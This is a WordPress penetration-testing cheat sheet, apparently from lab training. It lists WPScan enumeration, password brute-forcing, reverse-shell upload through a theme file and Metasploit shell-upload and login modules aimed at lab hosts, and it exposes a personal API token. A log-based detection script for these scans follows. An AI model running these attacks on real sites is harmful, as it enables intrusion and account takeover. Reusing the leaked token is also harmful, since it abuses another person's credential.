๐Ÿ”WPScan

https://www.kali.org/tools/wpscan/

wpscan -h #List WPscan Parameters
wpscan --update #Update WPscan

#Enumerate WordPress using WPscan


wpscan --url "http://<TARGET_IP>" -e t #All Themes Installed

wpscan --url "http://<TARGET_IP>" -e vt #Vulnerable Themes Installed

wpscan --url "http://<TARGET_IP>"  -e p #All Plugins Installed

wpscan --url "http://<TARGET_IP>"  -e vp #Vulnerable Plugins Installed

wpscan --url "http://<TARGET_IP>"  -e u #WordPress Users

wpscan --url "http://<TARGET_IP>"  --passwords path-to-wordlist #Brute Force WordPress Passwords

#Upload Reverse Shell to WordPress
http://<IP>/wordpress/wp-content/themes/twentyfifteen/404.php

#Upload using Metasploit
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit
#User Enumeration
wpscan --url https://example/ --enumerate u

#Bruteforce
wpscan --url https://example/ --passwords wordlist.txt --usernames samson

Enumerate and hack a web app using wpscan and metasploit

  • wpscan --api-token hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads --url http://10.10.10.16:8080/CEH --plugins-detection aggressive --enumerate u

  • --enumerate u: Specify the enumeration of users

  • API Token: Register at https://wpscan.com/register

  • Mine: hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads

  • service postgresql start

  • msfconsole

  • use auxiliary/scanner/http/wordpress_login_enum

  • show options

  • set PASS_FILE password.txt

  • set RHOST 10.10.10.16

  • set RPORT 8080

  • set USERNAME admin

  • run

  • Find the credential
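
Detection side of the user-enumeration and password-guessing runs above, as an added example that is not part of the original page: a Python check that flags the traces such scans leave in a web server access log. Assumptions: Apache/Nginx combined log format, author-ID and REST `users` requests as the enumeration indicators, a User-Agent containing "WPScan" (the tool's default unless overridden), and a hypothetical threshold of 3 login POSTs per client; the log lines are constructed.

```python
import re
from collections import Counter, defaultdict

# Combined log format: ip - - [time] "METHOD path proto" status size "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Requests commonly used to list WordPress accounts (assumed indicator set).
ENUM_RE = re.compile(r'[?&]author=\d+|/wp-json/wp/v2/users|rest_route=/wp/v2/users')
# Endpoints that accept credentials, under any base path (/wordpress, /CEH, ...).
LOGIN_RE = re.compile(r'/(wp-login\.php|xmlrpc\.php)(\?|$)')

def analyze(lines, login_threshold=3):
    """Return {client_ip: set of findings} for the given access-log lines."""
    findings = defaultdict(set)
    login_posts = Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, path = m["ip"], m["path"]
        if "wpscan" in m["ua"].lower():
            findings[ip].add("wpscan-user-agent")
        if ENUM_RE.search(path):
            findings[ip].add("user-enumeration")
        if m["method"] == "POST" and LOGIN_RE.search(path):
            login_posts[ip] += 1
    for ip, count in login_posts.items():
        if count >= login_threshold:  # repeated credential submissions
            findings[ip].add("login-bruteforce")
    return dict(findings)

# --- Constructed sample data (documentation IP ranges, not real traffic) ---
WPSCAN_UA = "WPScan v3.8.25 (https://wpscan.com/wordpress-security-scanner)"

def _line(ip, method, path, status, ua="Mozilla/5.0"):
    return (f'{ip} - - [01/Jan/2025:10:00:00 +0000] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"')

SAMPLE_LOG = (
    [_line("203.0.113.5", "GET", "/CEH/?author=1", 301, WPSCAN_UA),
     _line("203.0.113.5", "GET", "/CEH/wp-json/wp/v2/users", 200, WPSCAN_UA)]
    + [_line("203.0.113.5", "POST", "/CEH/wp-login.php", 200, WPSCAN_UA)] * 4
    + [_line("192.0.2.9", "POST", "/wordpress/xmlrpc.php", 200)] * 3
    + [_line("198.51.100.7", "POST", "/wordpress/wp-login.php", 302),
       _line("198.51.100.7", "GET", "/wordpress/index.php", 200)])

if __name__ == "__main__":
    for ip, found in sorted(analyze(SAMPLE_LOG).items()):
        print(ip, sorted(found))
```

The User-Agent match is only a convenience signal, since a scanner can send any header; the request-pattern checks are the ones to alert on and to pair with login rate limiting.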
